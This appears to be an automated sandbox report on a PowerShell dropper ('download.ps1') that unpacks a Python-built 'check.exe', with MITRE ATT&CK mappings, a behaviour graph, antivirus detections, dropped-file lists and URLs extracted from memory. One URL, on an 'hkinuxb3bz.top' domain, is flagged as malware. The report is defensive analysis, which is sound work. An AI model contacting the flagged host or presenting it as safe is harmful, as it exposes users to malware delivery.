Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeQueries volume information: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF7124FD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00007FF7124FD010
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeCode function: 4_2_00007FF712515C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,4_2_00007FF712515C00

Stealing of Sensitive Information

barindex
Opens network shares
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.pyJump to behavior
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile opened: \\Mac\shared\projects\loader\src\dropper\src\tmp\_main.py

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping1
Network Share Discovery		Remote Services1
Archive Collected Data		12
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		31
Virtualization/Sandbox Evasion		LSASS Memory2
System Time Discovery		Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Native API		Logon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager31
Security Software Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
PowerShell		Login HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS1
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets31
Virtualization/Sandbox Evasion		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
Software Packing		Cached Domain Credentials1
Application Window Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp		DCSync3
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc Filesystem32
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570493 Sample: download.ps1 Startdate: 07/12/2024 Architecture: WINDOWS Score: 68 82 nodejs.org 2->82 86 Antivirus detection for URL or domain 2->86 88 AI detected suspicious sample 2->88 10 powershell.exe 1 32 2->10         started        14 check.exe 153 2->14         started        16 check.exe 2->16         started        signatures3 process4 file5 64 C:\Users\user\AppData\Roaming\...\check.exe, PE32+ 10->64 dropped 92 Found suspicious powershell code related to unpacking or dynamic code loading 10->92 94 Loading BitLocker PowerShell Module 10->94 96 Powershell drops PE file 10->96 18 check.exe 153 10->18         started        21 conhost.exe 10->21         started        66 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 14->66 dropped 68 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 14->68 dropped 70 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 14->70 dropped 78 57 other files (none is malicious) 14->78 dropped 23 check.exe 14->23         started        72 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 16->72 dropped 74 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 16->74 dropped 76 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 16->76 dropped 80 57 other files (none is malicious) 16->80 dropped 26 check.exe 16->26         started        signatures6 process7 file8 56 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 18->56 dropped 58 C:\Users\user\AppData\Local\...\select.pyd, PE32+ 18->58 dropped 60 C:\Users\user\AppData\Local\...\python313.dll, PE32+ 18->60 dropped 62 57 other files (none is malicious) 18->62 dropped 28 check.exe 18->28         started        90 Opens network shares 23->90 32 cmd.exe 23->32         started        34 WerFault.exe 23->34         started        36 cmd.exe 26->36         started        38 WerFault.exe 26->38         started        signatures9 process10 dnsIp11 84 nodejs.org 104.20.23.46, 443, 49737, 49771 CLOUDFLARENETUS United States 28->84 98 Opens network shares 28->98 40 cmd.exe 1 28->40         started        42 WerFault.exe 19 16 28->42         started        44 conhost.exe 32->44         started        46 WMIC.exe 32->46         started        48 conhost.exe 36->48         started        50 WMIC.exe 36->50         started        signatures12 process13 process14 52 WMIC.exe 1 40->52         started        54 conhost.exe 40->54         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
download.ps18%ReversingLabsScript-PowerShell.Trojan.Powdow
download.ps16%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\MSVCP140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Core.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5DBus.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Gui.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Network.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Qml.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5QmlModels.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Quick.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Svg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5WebSockets.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Widgets.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\d3dcompiler_47.dll3%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\opengl32sw.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\generic\qtuiotouchplugin.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\iconengines\qsvgicon.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qgif.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qicns.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qico.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qjpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qsvg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtga.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtiff.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwbmp.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwebp.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qminimal.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qoffscreen.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwebgl.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwindows.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtCore.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtGui.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtWidgets.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\sip.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\_wmi.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md__mypyc.cp313-win_amd64.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\libcrypto-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\libffi-8.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\libssl-3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\psutil\_psutil_windows.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\python3.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\python313.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI26042\unicodedata.pyd0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Core.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5DBus.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Gui.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Network.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Qml.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5QmlModels.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Quick.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://repository.swisssign.com/i0%Avira URL Cloudsafe
http://www.color.org)0%Avira URL Cloudsafe
http://.../back.j(0%Avira URL Cloudsafe
http://hkinuxb3bz.top/1.php?s=527100%Avira URL Cloudmalware
http://ocsp.accv.esSQ80%Avira URL Cloudsafe
http://cacerts.digi0%Avira URL Cloudsafe
http://www.aiim.org/pdfa/ns/id/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nodejs.org
104.20.23.46
truefalse
    		high

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://github.com/urllib3/urlcheck.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpfalse
      		high
      https://github.com/giampaolo/psutil/issues/875.check.exe, 00000005.00000002.2740761730.0000029FDA960000.00000004.00001000.00020000.00000000.sdmpfalse
        		high
        http://.../back.j(check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://crl.dhimyotis.com/certignarootca.crl0check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          https://nodejs.org/dist/v22.11.0/node-v22.11.0-win-x64.zipcheck.exe, 00000005.00000002.2740761730.0000029FDA9D8000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://packaging.python.org/en/latest/specifications/recording-installed-packages/#the-record-filecheck.exe, 00000005.00000002.2737420337.0000029FD9896000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD9896000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://goo.gl/zeJZl.check.exe, 00000005.00000002.2739097916.0000029FDA118000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://tools.ietf.org/html/rfc2388#section-4.4check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD986E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2280765304.0000029FD97F6000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://packaging.python.org/en/latest/specifications/entry-points/#file-formatcheck.exe, 00000005.00000002.2737420337.0000029FD9896000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283352961.0000029FD9896000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://hkinuxb3bz.top/1.php?s=527powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://repository.swisssign.com/icheck.exe, 00000005.00000002.2737420337.0000029FD98C2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD98C2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963check.exe, 00000005.00000002.2738181811.0000029FD9BE0000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://cacerts.digicheck.exe, 00000004.00000003.2263045929.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.2255302902.000001C184425000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://peps.python.org/pep-0205/check.exe, 00000005.00000002.2737126213.0000029FD95C0000.00000004.00001000.00020000.00000000.sdmp, check.exe, 00000005.00000003.2277497052.0000029FD949C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2265685070.0000029FD9081000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.dhimyotis.com/certignarootca.crlcheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://curl.haxx.se/rfc/cookie_spec.htmlcheck.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.accv.escheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2198164900.0000022B11151000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filenamecheck.exe, 00000005.00000003.2276180826.0000029FD90AA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2274508858.0000029FD90B5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2276668202.0000029FD90A0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2275314166.0000029FD90B2000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxycheck.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.accv.esSQ8check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688check.exe, 00000005.00000002.2736121313.0000029FD8F04000.00000004.00001000.00020000.00000000.sdmpfalse
                                          		high
                                          https://httpbin.org/getcheck.exe, 00000005.00000002.2739097916.0000029FDA060000.00000004.00001000.00020000.00000000.sdmpfalse
                                            		high
                                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.cert.fnmt.es/dpcs//0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2198164900.0000022B13053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_codecheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://go.micropowershell.exe, 00000000.00000002.2198164900.0000022B12500000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://wwww.certigna.fr/autorites/0mcheck.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/readercheck.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/python/cpython/issues/86361.check.exe, 00000005.00000003.2277413521.0000029FD9533000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2279817570.0000029FD94A3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2277497052.0000029FD949C000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2281256649.0000029FD94B0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2277898979.0000029FD9477000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://mail.python.org/pipermail/python-dev/2012-June/120787.html.check.exe, 00000005.00000002.2738851397.0000029FD9F30000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://httpbin.org/check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://wwww.certigna.fr/autorites/check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_modulecheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_cachescheck.exe, 00000005.00000002.2736121313.0000029FD8E80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.color.org)check.exe, 00000005.00000002.2743333905.00007FF89DF9A000.00000002.00000001.01000000.00000024.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535check.exe, 00000005.00000003.2282278745.0000029FD9993000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9993000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sycheck.exe, 00000005.00000002.2736379235.0000029FD9080000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://packaging.python.org/en/latest/specifications/core-metadata/#core-metadatacheck.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crl.securetrust.com/STCA.crlcheck.exe, 00000005.00000003.2312815285.0000029FD9AC3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9ABB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://wwwsearch.sf.net/):check.exe, 00000005.00000003.2282278745.0000029FD99CF000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2282239891.0000029FD9AB0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://github.com/python/importlib_metadata/wiki/Development-Methodologycheck.exe, 00000005.00000002.2737284106.0000029FD96C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.accv.es/legislacion_c.htmcheck.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://tools.ietf.org/html/rfc6125#section-6.4.3check.exe, 00000005.00000002.2738633963.0000029FD9E10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://crl.xrampsecurity.com/XGCA.crl0check.exe, 00000005.00000003.2319400919.0000029FD99CA000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD99C5000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2736668202.0000029FD93C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2198164900.0000022B13053000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2198164900.0000022B11378000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://www.cert.fnmt.es/dpcs/check.exe, 00000005.00000002.2736668202.0000029FD947E000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2313843486.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9B34000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://google.com/mailcheck.exe, 00000005.00000003.2283352961.0000029FD97FB000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD97E0000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2319400919.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2737420337.0000029FD9955000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000003.2283651155.0000029FD9955000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://packaging.python.org/specifications/entry-points/check.exe, 00000005.00000002.2738402783.0000029FD9D00000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        		high
